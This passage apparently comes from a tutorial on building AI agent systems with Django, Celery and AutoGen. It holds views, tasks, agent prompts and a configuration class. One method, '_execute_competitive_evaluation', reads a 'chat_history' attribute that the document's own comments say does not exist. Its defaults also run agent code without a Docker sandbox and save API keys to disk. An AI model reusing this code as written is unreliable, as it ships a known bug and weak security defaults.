    @action(detail=True, methods=['post'])
    def archive(self, request, pk=None):
        """Archive a conversation."""
        conversation = self.get_object()
        conversation.is_active = False
        conversation.save()

        serializer = self.get_serializer(conversation)
        return Response(serializer.data)
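
The status checks in `cancel` and `feedback` amount to a small state machine over the execution statuses used in this section. The sketch below makes that explicit. `ALLOWED_TRANSITIONS`, `can_transition`, and `can_receive_feedback` are hypothetical names introduced for illustration and are not part of the views above; the transition table is inferred from the view and task code, so treat it as an assumption.

```python
# Hypothetical helper, not part of the original views.py.
# Status names are the ones used by the views and tasks in this section.
ALLOWED_TRANSITIONS = {
    "pending": {"running", "canceled"},
    "running": {"completed", "failed", "canceled"},
    "completed": set(),
    "failed": {"running"},  # a Celery retry moves a failed execution back to running
    "canceled": set(),
}


def can_transition(current: str, target: str) -> bool:
    """Return True if an execution may move from `current` to `target`."""
    return target in ALLOWED_TRANSITIONS.get(current, set())


def can_receive_feedback(status: str) -> bool:
    """Feedback is only accepted once an execution has completed."""
    return status == "completed"
```

Keeping the rules in one table means a view can reject an invalid request with a single `can_transition(execution.status, 'canceled')` check instead of repeating status lists.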
python
# tasks.py
import time
import logging
from celery import shared_task
from django.utils import timezone
from django.db import transaction

logger = logging.getLogger(__name__)

@shared_task(bind=True, max_retries=3, default_retry_delay=60)
def execute_agent_task(self, execution_id):
    """Execute an agent task asynchronously."""
    # Imported here to avoid circular imports at module load time
    from .models import AgentExecution
    from .agents import get_agent_registry

    logger.info(f"Starting agent execution {execution_id}")

    try:
        # Get the execution
        execution = AgentExecution.objects.get(id=execution_id)

        # Update status to running
        execution.status = 'running'
        execution.started_at = timezone.now()
        execution.save()

        # Get the agent registry
        agent_registry = get_agent_registry()

        # Get the agent factory
        agent_type_name = execution.agent_type.name
        if agent_type_name not in agent_registry:
            raise ValueError(f"Unknown agent type: {agent_type_name}")

        agent_factory = agent_registry[agent_type_name]

        # Create the agent
        agent = agent_factory(execution.parameters)

        # Start timing
        start_time = time.time()

        # Execute the agent
        result = agent.execute(execution.parameters)

        # Calculate execution time
        execution_time = time.time() - start_time

        # Update execution with results
        execution.status = 'completed'
        execution.result = result
        execution.completed_at = timezone.now()
        execution.execution_time = execution_time

        # Extract token usage if available (guard against non-dict results)
        if isinstance(result, dict) and 'token_usage' in result:
            execution.tokens_used = result['token_usage'].get('total_tokens', 0)

        execution.save()

        logger.info(f"Completed agent execution {execution_id}")
        return {'execution_id': execution_id, 'status': 'completed'}

    except Exception as e:
        logger.exception(f"Error executing agent {execution_id}: {str(e)}")

        try:
            # Update execution with error
            execution = AgentExecution.objects.get(id=execution_id)
            execution.status = 'failed'
            execution.error_message = str(e)
            execution.completed_at = timezone.now()
            execution.save()
        except Exception as inner_e:
            logger.exception(f"Error updating execution status: {str(inner_e)}")

        # Retry only for transient errors (rate limits and timeouts)
        if 'Rate limit' in str(e) or 'timeout' in str(e).lower():
            raise self.retry(exc=e)

        return {'execution_id': execution_id, 'status': 'failed', 'error': str(e)}

@shared_task(bind=True, max_retries=2)
def process_agent_message(self, conversation_id, message_id):
    """Process a message in a conversation and generate agent response."""
    from .models import AgentConversation, ConversationMessage
    from .agents import get_agent_registry

    logger.info(f"Processing message {message_id} in conversation {conversation_id}")

    try:
        # Get the conversation and message
        conversation = AgentConversation.objects.get(id=conversation_id)
        message = ConversationMessage.objects.get(id=message_id, conversation=conversation)

        # Get recent conversation history (last 10 messages)
        history = list(conversation.messages.order_by('-created_at')[:10])
        history.reverse()  # Chronological order

        # Format history for the agent
        formatted_history = []
        for msg in history:
            if msg.id != message.id:  # Skip the current message
                formatted_history.append({
                    'role': msg.role,
                    'content': msg.content
                })

        # Get the agent registry
        agent_registry = get_agent_registry()

        # Get the agent factory
        agent_type_name = conversation.agent_type.name
        if agent_type_name not in agent_registry:
            raise ValueError(f"Unknown agent type: {agent_type_name}")

        agent_factory = agent_registry[agent_type_name]

        # Create the agent
        agent = agent_factory({})

        # Generate response
        response = agent.generate_response(
            message=message.content,
            history=formatted_history,
            metadata=conversation.metadata
        )

        # Create response message
        with transaction.atomic():
            agent_message = ConversationMessage.objects.create(
                conversation=conversation,
                role='assistant',
                content=response['content'],
                tokens=response.get('tokens', 0),
                metadata=response.get('metadata', {})
            )

            # Update conversation timestamp
            conversation.updated_at = timezone.now()
            conversation.save()

        logger.info(f"Created response message {agent_message.id} in conversation {conversation_id}")
        return {
            'conversation_id': conversation_id,
            'message_id': str(message.id),
            'response_id': str(agent_message.id),
            'status': 'completed'
        }

    except Exception as e:
        logger.exception(f"Error processing message {message_id}: {str(e)}")

        try:
            # Create error message
            error_message = f"I'm sorry, I encountered an error processing your message: {str(e)}"

            ConversationMessage.objects.create(
                conversation_id=conversation_id,
                role='system',
                content=error_message
            )
        except Exception as inner_e:
            logger.exception(f"Error creating error message: {str(inner_e)}")

        # Retry for certain errors
        if 'Rate limit' in str(e) or 'timeout' in str(e).lower():
            raise self.retry(exc=e)

        return {
            'conversation_id': conversation_id,
            'message_id': message_id,
            'status': 'failed',
            'error': str(e)
        }
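
Both tasks retry only when the error text mentions a rate limit or a timeout. A minimal sketch of how that check could be factored into one place follows, together with an exponential backoff delay. `is_retryable` and `retry_delay` are hypothetical helper names, and the backoff is an addition for illustration: the tasks above retry after a fixed delay.

```python
def is_retryable(exc: Exception) -> bool:
    """Mirror the string check used in the tasks: rate limits and timeouts are transient."""
    text = str(exc)
    return "Rate limit" in text or "timeout" in text.lower()


def retry_delay(attempt: int, base: int = 60, cap: int = 600) -> int:
    """Exponential backoff in seconds: base, 2*base, 4*base, ... capped at `cap`."""
    return min(base * (2 ** attempt), cap)
```

Inside a bound Celery task this could be used as `raise self.retry(exc=e, countdown=retry_delay(self.request.retries))`. Matching on message text is fragile; where the client library exposes dedicated exception classes, checking those with `isinstance` is usually more reliable.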
python
# urls.py
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from . import views

router = DefaultRouter()
router.register(r'agent-types', views.AgentTypeViewSet, basename='agent-type')
router.register(r'executions', views.AgentExecutionViewSet, basename='execution')
router.register(r'conversations', views.ConversationViewSet, basename='conversation')

urlpatterns = [
    path('', include(router.urls)),
]

Key Differences Between FastAPI and Django for AI Agent Systems:

  1. Setup Complexity:

    • FastAPI: Lightweight and modular; set up only what you need
    • Django: Comprehensive framework with more initial setup but comes with many built-in features
  2. Performance:

    • FastAPI: Built for high-performance async processing, ideal for agent-based systems with many concurrent requests
    • Django: Traditionally synchronous (async views are supported since Django 3.1), with slightly more per-request overhead, but still able to handle high loads
  3. Database Access:

    • FastAPI: Flexible - use any ORM or direct database access
    • Django: Built-in ORM with powerful query capabilities and migrations
  4. Admin Interface:

    • FastAPI: Requires custom implementation
    • Django: Comes with a powerful admin interface out of the box
  5. Authentication and Security:

    • FastAPI: Ships OAuth2 and API-key helpers in fastapi.security; user management, sessions, and permissions require manual implementation or third-party libraries
    • Django: Comprehensive built-in authentication and security features
  6. Scaling Strategy:

    • FastAPI: Often deployed with multiple instances behind a load balancer
    • Django: Similar scaling approach, but with more consideration for database connections
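
To make the database-connection point concrete: each Django web worker and each Celery worker process opens its own database connection, so the total grows with the number of processes. A hedged sketch of the relevant settings follows. The database name, host, and the 60-second lifetime are placeholder assumptions, not values from this project.

```python
# settings.py fragment (illustrative values only)
import os

DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.postgresql",
        "NAME": os.environ.get("DB_NAME", "agents"),     # placeholder name
        "HOST": os.environ.get("DB_HOST", "localhost"),  # placeholder host
        "CONN_MAX_AGE": 60,          # reuse a connection for up to 60 seconds
        "CONN_HEALTH_CHECKS": True,  # Django 4.1+: verify a reused connection before use
    }
}
```

With persistent connections enabled, the database's connection limit should be sized for web workers plus Celery workers; a connection pooler in front of the database is a common alternative when that number grows large.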

Configuring AutoGen for Multi-Agent Interactions

AutoGen lets specialized agents collaborate on problems that a single agent handles poorly. The configuration below covers three parts: defining specialized agents, grouping them into different collaboration patterns, and tuning advanced settings.

1. Defining Specialized Agents

python
# agent_framework/specialized_agents.py
import autogen
from typing import Dict, List, Any, Optional

class SpecializedAgentFactory:
    """Factory for creating specialized agents with specific capabilities."""

    def __init__(self, llm_config: Dict[str, Any]):
        """Initialize with base LLM configuration."""
        self.llm_config = llm_config

    def create_research_agent(self) -> autogen.AssistantAgent:
        """Create a research specialist agent."""
        return autogen.AssistantAgent(
            name="ResearchAgent",
            system_message="""You are a research specialist who excels at gathering comprehensive information.

            Your capabilities:
            1. Finding detailed information on complex topics
            2. Identifying key points and summarizing research findings
            3. Evaluating the reliability and credibility of sources
            4. Organizing information in a structured way
            5. Identifying knowledge gaps that require further research

            When conducting research:
            - Start by understanding the core question and breaking it into sub-questions
            - Consider multiple perspectives and potential biases
            - Cite sources and distinguish between facts and inferences
            - Organize findings in a logical structure
            - Highlight confidence levels in different pieces of information
            """,
            llm_config=self.llm_config
        )

    def create_reasoning_agent(self) -> autogen.AssistantAgent:
        """Create a reasoning and analysis specialist agent."""
        return autogen.AssistantAgent(
            name="ReasoningAgent",
            system_message="""You are a reasoning and analysis specialist with exceptional critical thinking.

            Your capabilities:
            1. Analyzing complex problems and breaking them down systematically
            2. Identifying logical fallacies and cognitive biases
            3. Weighing evidence and evaluating arguments
            4. Drawing sound conclusions based on available information
            5. Considering alternative explanations and counterfactuals

            When analyzing problems:
            - Clarify the core problem and relevant considerations
            - Identify assumptions and evaluate their validity
            - Consider multiple perspectives and approaches
            - Look for logical inconsistencies and gaps in reasoning
            - Develop structured arguments with clear logical flow
            """,
            llm_config=self.llm_config
        )

    def create_coding_agent(self) -> autogen.AssistantAgent:
        """Create a coding specialist agent."""
        # Cap the temperature at 0.3 so generated code stays deterministic
        coding_config = self.llm_config.copy()
        coding_config["temperature"] = min(coding_config.get("temperature", 0.7), 0.3)

        return autogen.AssistantAgent(
            name="CodingAgent",
            system_message="""You are a coding specialist who excels at software development and implementation.

            Your capabilities:
            1. Writing clean, efficient, and maintainable code
            2. Debugging and solving technical problems
            3. Designing software solutions for specific requirements
            4. Explaining code functionality and design decisions
            5. Optimizing code for performance and readability

            When writing code:
            - Ensure code is correct, efficient, and follows best practices
            - Include clear comments explaining complex logic
            - Consider edge cases and error handling
            - Focus on clean, maintainable structure
            - Test thoroughly and validate solutions
            """,
            llm_config=coding_config
        )

    def create_critic_agent(self) -> autogen.AssistantAgent:
        """Create a critic agent for evaluating solutions and identifying flaws."""
        # Cap the temperature at 0.4 for consistent evaluations
        critic_config = self.llm_config.copy()
        critic_config["temperature"] = min(critic_config.get("temperature", 0.7), 0.4)

        return autogen.AssistantAgent(
            name="CriticAgent",
            system_message="""You are a critical evaluation specialist who excels at identifying flaws and improvements.

            Your capabilities:
            1. Identifying logical flaws and inconsistencies in reasoning
            2. Spotting edge cases and potential failure modes in solutions
            3. Suggesting specific improvements to solutions
            4. Challenging assumptions and evaluating evidence
            5. Providing constructive criticism in a clear, actionable way

            When providing critique:
            - Be specific about what issues you've identified
            - Explain why each issue matters and its potential impact
            - Suggest concrete improvements, not just problems
            - Consider both major and minor issues
            - Be thorough but constructive in your feedback
            """,
            llm_config=critic_config
        )

    def create_pm_agent(self) -> autogen.AssistantAgent:
        """Create a project manager agent for coordinating multi-step tasks."""
        return autogen.AssistantAgent(
            name="ProjectManager",
            system_message="""You are a project management specialist who excels at organizing and coordinating complex tasks.

            Your capabilities:
            1. Breaking down complex problems into manageable steps
            2. Assigning appropriate tasks to different specialists
            3. Tracking progress and ensuring all aspects are addressed
            4. Synthesizing information from different sources
            5. Ensuring the final deliverable meets requirements

            When managing projects:
            - Start by clarifying the overall goal and requirements
            - Create a structured plan with clear steps
            - Determine what specialist skills are needed for each step
            - Monitor progress and adjust the plan as needed
            - Ensure all components are integrated into a cohesive final product
            """,
            llm_config=self.llm_config
        )

    def create_creative_agent(self) -> autogen.AssistantAgent:
        """Create a creative specialist for innovative solutions and content."""
        # Raise the temperature to at least 0.8 for more varied output
        creative_config = self.llm_config.copy()
        creative_config["temperature"] = max(creative_config.get("temperature", 0.7), 0.8)

        return autogen.AssistantAgent(
            name="CreativeAgent",
            system_message="""You are a creative specialist who excels at generating innovative ideas and content.

            Your capabilities:
            1. Generating novel approaches to problems
            2. Creating engaging and original content
            3. Thinking outside conventional frameworks
            4. Connecting disparate concepts in insightful ways
            5. Developing unique perspectives and innovative solutions

            When approaching creative tasks:
            - Consider unconventional approaches and perspectives
            - Look for unexpected connections between concepts
            - Blend different ideas to create something new
            - Balance creativity with practicality and relevance
            - Iterate and refine creative concepts
            """,
            llm_config=creative_config
        )
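
The factory adjusts the sampling temperature per role by copying the base configuration and clamping one key. A minimal sketch of that pattern as a standalone function follows. `with_temperature` is a hypothetical helper and not part of the factory; the default of 0.7 matches the fallback used in the listing.

```python
from typing import Any, Dict, Optional


def with_temperature(
    base: Dict[str, Any],
    *,
    at_most: Optional[float] = None,
    at_least: Optional[float] = None,
    default: float = 0.7,
) -> Dict[str, Any]:
    """Return a copy of `base` whose temperature is clamped to the given bounds."""
    config = base.copy()  # shallow copy: nested values such as config_list stay shared
    temperature = config.get("temperature", default)
    if at_most is not None:
        temperature = min(temperature, at_most)
    if at_least is not None:
        temperature = max(temperature, at_least)
    config["temperature"] = temperature
    return config
```

For example, `with_temperature(llm_config, at_most=0.3)` reproduces the coding agent's setting and `with_temperature(llm_config, at_least=0.8)` the creative agent's. Because the copy is shallow, mutating a nested entry such as `config_list` in one agent's configuration would affect all of them; use `copy.deepcopy` if per-agent model lists are needed.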

2. Creating Agent Groups with Different Collaboration Patterns

python
# agent_framework/agent_groups.py
import json  # used when serializing specialist outputs for the manager
import autogen
from typing import Dict, List, Any, Optional
from .specialized_agents import SpecializedAgentFactory

class AgentGroupFactory:
    """Factory for creating different configurations of agent groups."""

    def __init__(self, llm_config: Dict[str, Any]):
        """Initialize with base LLM configuration."""
        self.llm_config = llm_config
        self.agent_factory = SpecializedAgentFactory(llm_config)

    def create_sequential_group(self, user_proxy=None) -> Dict[str, Any]:
        """
        Create a group of agents that work in sequence.

        Returns:
            Dictionary with agents and execution manager
        """
        if user_proxy is None:
            user_proxy = self._create_default_user_proxy()

        # Create specialized agents
        research_agent = self.agent_factory.create_research_agent()
        reasoning_agent = self.agent_factory.create_reasoning_agent()
        critic_agent = self.agent_factory.create_critic_agent()

        # Return the agents and a function to execute them in sequence
        return {
            "user_proxy": user_proxy,
            "agents": {
                "research": research_agent,
                "reasoning": reasoning_agent,
                "critic": critic_agent
            },
            "execute": lambda problem: self._execute_sequential_workflow(
                user_proxy=user_proxy,
                research_agent=research_agent,
                reasoning_agent=reasoning_agent,
                critic_agent=critic_agent,
                problem=problem
            )
        }

    def create_groupchat(self, user_proxy=None) -> Dict[str, Any]:
        """
        Create a group chat with multiple specialized agents.

        Returns:
            Dictionary with group chat and manager
        """
        if user_proxy is None:
            user_proxy = self._create_default_user_proxy()

        # Create specialized agents
        research_agent = self.agent_factory.create_research_agent()
        reasoning_agent = self.agent_factory.create_reasoning_agent()
        creative_agent = self.agent_factory.create_creative_agent()
        critic_agent = self.agent_factory.create_critic_agent()
        pm_agent = self.agent_factory.create_pm_agent()

        # Create group chat
        groupchat = autogen.GroupChat(
            agents=[user_proxy, pm_agent, research_agent, reasoning_agent, creative_agent, critic_agent],
            messages=[],
            max_round=20,
            speaker_selection_method="round_robin"  # Options: "auto", "round_robin", "random"
        )

        manager = autogen.GroupChatManager(groupchat=groupchat, llm_config=self.llm_config)

        return {
            "user_proxy": user_proxy,
            "agents": {
                "pm": pm_agent,
                "research": research_agent,
                "reasoning": reasoning_agent,
                "creative": creative_agent,
                "critic": critic_agent
            },
            "groupchat": groupchat,
            "manager": manager,
            "execute": lambda problem: self._execute_groupchat(
                user_proxy=user_proxy,
                manager=manager,
                problem=problem
            )
        }

    def create_hierarchical_team(self, user_proxy=None) -> Dict[str, Any]:
        """
        Create a hierarchical team with a manager and specialized agents.

        Returns:
            Dictionary with team structure and execution function
        """
        if user_proxy is None:
            user_proxy = self._create_default_user_proxy()

        # Create specialized agents
        pm_agent = self.agent_factory.create_pm_agent()
        research_agent = self.agent_factory.create_research_agent()
        reasoning_agent = self.agent_factory.create_reasoning_agent()
        coding_agent = self.agent_factory.create_coding_agent()
        critic_agent = self.agent_factory.create_critic_agent()
        creative_agent = self.agent_factory.create_creative_agent()

        # Define the team hierarchy
        team = {
            "manager": pm_agent,
            "specialists": {
                "research": research_agent,
                "reasoning": reasoning_agent,
                "coding": coding_agent,
                "creativity": creative_agent,
                "critique": critic_agent
            }
        }

        return {
            "user_proxy": user_proxy,
            "team": team,
            "execute": lambda problem: self._execute_hierarchical_team(
                user_proxy=user_proxy,
                team=team,
                problem=problem
            )
        }

    def create_competitive_evaluation_team(self, user_proxy=None) -> Dict[str, Any]:
        """
        Create a competitive setup where multiple agents solve a problem
        and a judge evaluates their solutions.

        Returns:
            Dictionary with team structure and execution function
        """
        if user_proxy is None:
            user_proxy = self._create_default_user_proxy()

        # Create specialized solution agents
        reasoning_agent = self.agent_factory.create_reasoning_agent()
        creative_agent = self.agent_factory.create_creative_agent()
        research_agent = self.agent_factory.create_research_agent()

        # Create judge agent with specific configuration for evaluation
        judge_config = self.llm_config.copy()
        judge_config["temperature"] = 0.2  # Low temperature for consistent evaluation

        judge_agent = autogen.AssistantAgent(
            name="JudgeAgent",
            system_message="""You are an evaluation judge who assesses solutions objectively based on accuracy,
            completeness, efficiency, innovation, and practicality.

            Your task is to:
            1. Evaluate each proposed solution based on clear criteria
            2. Identify strengths and weaknesses of each approach
            3. Select the best solution or suggest a hybrid approach combining strengths
            4. Provide clear reasoning for your evaluation decisions
            5. Be fair, impartial, and thorough in your assessment

            Your evaluation should be structured, criteria-based, and focused on the quality of the solution.
            """,
            llm_config=judge_config
        )

        return {
            "user_proxy": user_proxy,
            "solution_agents": {
                "reasoning": reasoning_agent,
                "creative": creative_agent,
                "research": research_agent
            },
            "judge": judge_agent,
            "execute": lambda problem: self._execute_competitive_evaluation(
                user_proxy=user_proxy,
                solution_agents=[reasoning_agent, creative_agent, research_agent],
                judge_agent=judge_agent,
                problem=problem
            )
        }

    # Helper methods for executing different group configurations

    def _create_default_user_proxy(self) -> autogen.UserProxyAgent:
        """Create a default user proxy agent that never auto-replies."""
        return autogen.UserProxyAgent(
            name="User",
            human_input_mode="NEVER",
            max_consecutive_auto_reply=0,
            code_execution_config={"work_dir": "coding_workspace", "use_docker": False}
        )

    def _execute_sequential_workflow(self, user_proxy, research_agent, reasoning_agent, critic_agent, problem):
        """Execute a sequential workflow where agents work one after another."""
        # AutoGen 0.2 agents have no `chat_history` attribute. Each agent keeps one
        # message list per peer in `chat_messages`, and `last_message(peer)` returns
        # the newest entry. This assumes the proxy never auto-replies
        # (max_consecutive_auto_reply=0), so the newest entry is the agent's reply.

        # Step 1: Research gathers information
        user_proxy.initiate_chat(
            research_agent,
            message=f"I need you to research this problem thoroughly: {problem}\n\nGather relevant information, identify key concepts, and provide a comprehensive research summary."
        )
        research_results = user_proxy.last_message(research_agent)["content"]

        # Step 2: Reasoning agent analyzes and solves
        user_proxy.initiate_chat(
            reasoning_agent,
            message=f"Based on this research: {research_results}\n\nPlease analyze and develop a solution to the original problem: {problem}"
        )
        solution = user_proxy.last_message(reasoning_agent)["content"]

        # Step 3: Critic evaluates the solution
        user_proxy.initiate_chat(
            critic_agent,
            message=f"Critically evaluate this solution to the problem: {problem}\n\nSolution: {solution}\n\nIdentify any flaws, weaknesses, or areas for improvement."
        )
        critique = user_proxy.last_message(critic_agent)["content"]

        # Return the complete workflow results
        return {
            "problem": problem,
            "research": research_results,
            "solution": solution,
            "critique": critique,
            "chat_history": {
                agent.name: user_proxy.chat_messages[agent]
                for agent in (research_agent, reasoning_agent, critic_agent)
            }
        }

    def _execute_groupchat(self, user_proxy, manager, problem):
        """Execute a group chat discussion to solve a problem."""
        # Start the group chat with the problem statement
        prompt = f"""
        Problem to solve: {problem}

        Please work together to solve this problem effectively. The ProjectManager should coordinate the process:

        1. Start by understanding and breaking down the problem
        2. The ResearchAgent should gather relevant information
        3. The ReasoningAgent should analyze the information and develop a solution approach
        4. The CreativeAgent should propose innovative perspectives or approaches
        5. The CriticAgent should evaluate the proposed solution and suggest improvements
        6. Finalize a comprehensive solution addressing all aspects of the problem

        Each agent should contribute based on their expertise. The final solution should be comprehensive, accurate, and well-reasoned.
        """

        user_proxy.initiate_chat(manager, message=prompt)

        # AutoGen 0.2 agents have no `chat_history` attribute. The manager broadcasts
        # every turn to all participants, so the proxy's message list for the manager
        # holds the whole discussion.
        transcript = user_proxy.chat_messages[manager]

        # Extract the final solution from the transcript
        # (In a real implementation, you might want to look for a specific concluding message)
        solution_message = None
        for message in reversed(transcript):
            content = message.get("content") or ""
            # Messages the proxy sent itself are stored with role "assistant"; skip them
            # and look for a substantial message summarizing the solution
            if message.get("role") != "assistant" and len(content) > 500:
                solution_message = message
                break

        solution = solution_message["content"] if solution_message else "No clear solution was reached."

        return {
            "problem": problem,
            "solution": solution,
            "chat_history": transcript
        }

    def _execute_hierarchical_team(self, user_proxy, team, problem):
        """Execute a hierarchical team workflow with a manager coordinating specialists."""
        # AutoGen 0.2 agents have no `chat_history` attribute; `last_message(peer)`
        # returns the newest message exchanged with that peer. This assumes the proxy
        # never auto-replies, so the newest message is the agent's reply.
        manager = team["manager"]

        # Step 1: Manager creates a plan
        user_proxy.initiate_chat(
            manager,
            message=f"We need to solve this problem: {problem}\n\nPlease create a detailed plan breaking this down into steps, indicating which specialist should handle each step: Research, Reasoning, Coding, Creativity, or Critique."
        )
        plan = user_proxy.last_message(manager)["content"]

        # Step 2: Execute the plan by working with specialists in sequence
        results = {"plan": plan, "specialist_outputs": {}}

        # This is a simplified version - in a real implementation, you would parse the plan
        # and dynamically determine which specialists to call in which order
        specialists_sequence = [
            ("research", "Please research this problem and provide relevant information and context: " + problem),
            ("reasoning", "Based on our research, please analyze this problem and outline a solution approach: " + problem),
            ("coding", "Please implement the technical aspects of our solution approach to this problem: " + problem),
            ("creativity", "Please review our current approach and suggest any creative improvements or alternative perspectives: " + problem),
            ("critique", "Please review our complete solution and identify any issues or areas for improvement: " + problem)
        ]

        for specialist_key, message_text in specialists_sequence:
            specialist = team["specialists"][specialist_key]

            user_proxy.initiate_chat(
                specialist,
                message=message_text
            )

            # Extract specialist output
            results["specialist_outputs"][specialist_key] = user_proxy.last_message(specialist)["content"]

        # Step 3: Manager integrates all outputs into a final solution
        integration_message = f"""
        Now that all specialists have contributed, please integrate their work into a cohesive final solution to the original problem.

        Original problem: {problem}

        Specialist contributions:
        {json.dumps(results['specialist_outputs'], indent=2)}

        Please provide a comprehensive final solution that incorporates all relevant specialist input.
        """

        # initiate_chat clears the earlier planning exchange with the manager by default;
        # the plan itself is already stored in results["plan"]
        user_proxy.initiate_chat(manager, message=integration_message)

        # Extract the final solution
        results["final_solution"] = user_proxy.last_message(manager)["content"]
        results["chat_history"] = {
            agent.name: user_proxy.chat_messages[agent]
            for agent in [manager, *team["specialists"].values()]
        }

        return results

    def _execute_competitive_evaluation(self, user_proxy, solution_agents, judge_agent, problem):
        """Execute a competitive process where multiple agents propose solutions and a judge evaluates them."""
        # Step 1: Each solution agent develops their own approach
        solutions = {}

        for agent in solution_agents:
            user_proxy.initiate_chat(
                agent,
                message=f"Please solve this problem using your unique approach and expertise: {problem}\n\nProvide a comprehensive solution."
            )

            # Extract the most recent reply sent by this agent
            solution = None
            for message in reversed(user_proxy.chat_history):
                if message["role"] == "assistant" and message.get("name") == agent.name:
                    solution = message["content"]
                    break

            solutions[agent.name] = solution

        # Step 2: Judge evaluates all solutions
        evaluation_request = f"""
        Please evaluate the following solutions to this problem:

        Problem: {problem}

        {'-' * 40}

        """

        for agent_name, solution in solutions.items():
            evaluation_request += f"{agent_name}'s Solution:\n{solution}\n\n{'-' * 40}\n\n"

        evaluation_request += """
        Please evaluate each solution based on the following criteria:
        1. Accuracy and correctness
        2. Completeness (addresses all aspects of the problem)
        3. Efficiency and elegance
        4. Innovation and creativity
        5. Practicality and feasibility

        For each solution, provide a score from 1-10 on each criterion, along with a brief explanation.

        Then select the best overall solution OR propose a hybrid approach that combines the strengths of multiple solutions.

        Provide your detailed evaluation and final recommendation.
        """

        user_proxy.initiate_chat(judge_agent, message=evaluation_request)

        # Extract evaluation; match on the judge's actual name rather than a hard-coded string
        evaluation = None
        for message in reversed(user_proxy.chat_history):
            if message["role"] == "assistant" and message.get("name") == judge_agent.name:
                evaluation = message["content"]
                break

        return {
            "problem": problem,
            "solutions": solutions,
            "evaluation": evaluation,
            "chat_history": user_proxy.chat_history
        }
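
Both orchestration methods above repeat the same "walk the history backwards until a named agent's reply appears" loop. A minimal sketch of factoring that loop into one helper follows. It assumes the history is a list of dictionaries with `role`, `name`, and `content` keys, as the loops above do; `last_reply_from` and the sample history are hypothetical names used only for illustration.

```python
from typing import Any, Dict, List, Optional


def last_reply_from(history: List[Dict[str, Any]], agent_name: str) -> Optional[str]:
    """Return the content of the most recent assistant message sent by agent_name."""
    for message in reversed(history):
        if message.get("role") == "assistant" and message.get("name") == agent_name:
            return message.get("content")
    return None


# Hypothetical history in the same shape the loops above iterate over
history = [
    {"role": "user", "name": "User", "content": "Solve X"},
    {"role": "assistant", "name": "AgentA", "content": "Draft answer"},
    {"role": "assistant", "name": "JudgeAgent", "content": "AgentA scores 8/10"},
]

print(last_reply_from(history, "AgentA"))
print(last_reply_from(history, "Missing"))
```

Returning `None` for an agent that never replied keeps the caller's existing "no solution found" handling intact.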

3. Configuring Advanced AutoGen Features

python
# agent_framework/advanced_config.py
import os
import json
import logging
from typing import Dict, List, Any, Optional

class AutoGenConfig:
    """Configuration manager for AutoGen multi-agent systems."""

    def __init__(self, config_path: Optional[str] = None):
        """
        Initialize AutoGen configuration.

        Args:
            config_path: Optional path to a JSON configuration file
        """
        self.logger = logging.getLogger("autogen_config")

        # Default configuration
        self.config = {
            "llm": {
                "config_list": [
                    {
                        "model": "gpt-4-turbo",
                        "api_key": os.environ.get("OPENAI_API_KEY", "")
                    }
                ],
                "temperature": 0.7,
                "request_timeout": 300,
                "max_tokens": 4000,
                "seed": None
            },
            "agents": {
                "termination": {
                    "max_turns": 30,
                    "terminate_on_keywords": ["FINAL ANSWER", "TASK COMPLETE"],
                    "max_consecutive_auto_reply": 10
                },
                "user_proxy": {
                    "human_input_mode": "NEVER",
                    "code_execution_config": {
                        "work_dir": "workspace",
                        "use_docker": False
                    }
                }
            },
            "logging": {
                "level": "INFO",
                "log_file": "autogen.log"
            },
            "caching": {
                "enabled": True,
                "cache_path": ".cache/autogen",
                "cache_seed": 42
            }
        }

        # Load configuration from file if provided
        if config_path and os.path.exists(config_path):
            self._load_config(config_path)

        # Setup logging
        self._setup_logging()

    def _load_config(self, config_path: str):
        """Load configuration from JSON file."""
        try:
            with open(config_path, 'r') as f:
                file_config = json.load(f)

            # Update config with file values (deep merge)
            self._deep_update(self.config, file_config)
            self.logger.info(f"Loaded configuration from {config_path}")
        except Exception as e:
            self.logger.error(f"Error loading configuration from {config_path}: {str(e)}")

    def _deep_update(self, d: Dict, u: Dict):
        """Recursively update a dictionary."""
        for k, v in u.items():
            if isinstance(v, dict) and k in d and isinstance(d[k], dict):
                self._deep_update(d[k], v)
            else:
                d[k] = v

    def _setup_logging(self):
        """Configure logging based on settings."""
        log_level = getattr(logging, self.config["logging"]["level"], logging.INFO)

        logging.basicConfig(
            level=log_level,
            format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
            handlers=[
                logging.StreamHandler(),
                logging.FileHandler(self.config["logging"]["log_file"])
            ]
        )

    def get_llm_config(self, agent_type: Optional[str] = None) -> Dict[str, Any]:
        """
        Get LLM configuration, optionally customized for a specific agent type.

        Args:
            agent_type: Optional agent type for specific configurations

        Returns:
            Dictionary with LLM configuration
        """
        base_config = {
            "config_list": self.config["llm"]["config_list"],
            "temperature": self.config["llm"]["temperature"],
            "request_timeout": self.config["llm"]["request_timeout"],
            "max_tokens": self.config["llm"]["max_tokens"]
        }

        # Add caching if enabled
        if self.config["caching"]["enabled"]:
            base_config["cache_seed"] = self.config["caching"]["cache_seed"]

        # Apply agent-specific customizations if needed:
        # coding agents are capped at 0.3, creative agents get at least 0.8
        if agent_type == "coding":
            base_config["temperature"] = min(base_config["temperature"], 0.3)
        elif agent_type == "creative":
            base_config["temperature"] = max(base_config["temperature"], 0.8)

        return base_config

    def get_termination_config(self) -> Dict[str, Any]:
        """Get termination configuration for conversations."""
        return self.config["agents"]["termination"]

    def get_user_proxy_config(self) -> Dict[str, Any]:
        """Get user proxy agent configuration."""
        return self.config["agents"]["user_proxy"]

    def get_work_dir(self) -> str:
        """Get the working directory for code execution."""
        return self.config["agents"]["user_proxy"]["code_execution_config"]["work_dir"]

    def save_config(self, config_path: str):
        """Save current configuration to a file.

        Note: the saved file includes the API keys held in the LLM config list.
        """
        try:
            # os.path.dirname returns "" for a bare filename, and os.makedirs("") raises,
            # so only create the directory when the path actually has one
            directory = os.path.dirname(config_path)
            if directory:
                os.makedirs(directory, exist_ok=True)
            with open(config_path, 'w') as f:
                json.dump(self.config, f, indent=2)
            self.logger.info(f"Saved configuration to {config_path}")
        except Exception as e:
            self.logger.error(f"Error saving configuration to {config_path}: {str(e)}")
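
The deep merge is what lets a configuration file override a single nested value without restating the whole section. A minimal standalone sketch of the same recursion follows; the `defaults` and `file_config` values are illustrative rather than taken from a real deployment, and `deep_update` here is a free function rather than the class method above.

```python
import copy
from typing import Any, Dict


def deep_update(base: Dict[str, Any], override: Dict[str, Any]) -> Dict[str, Any]:
    """Recursively merge override into base in place and return base."""
    for key, value in override.items():
        if isinstance(value, dict) and isinstance(base.get(key), dict):
            deep_update(base[key], value)
        else:
            base[key] = value
    return base


defaults = {
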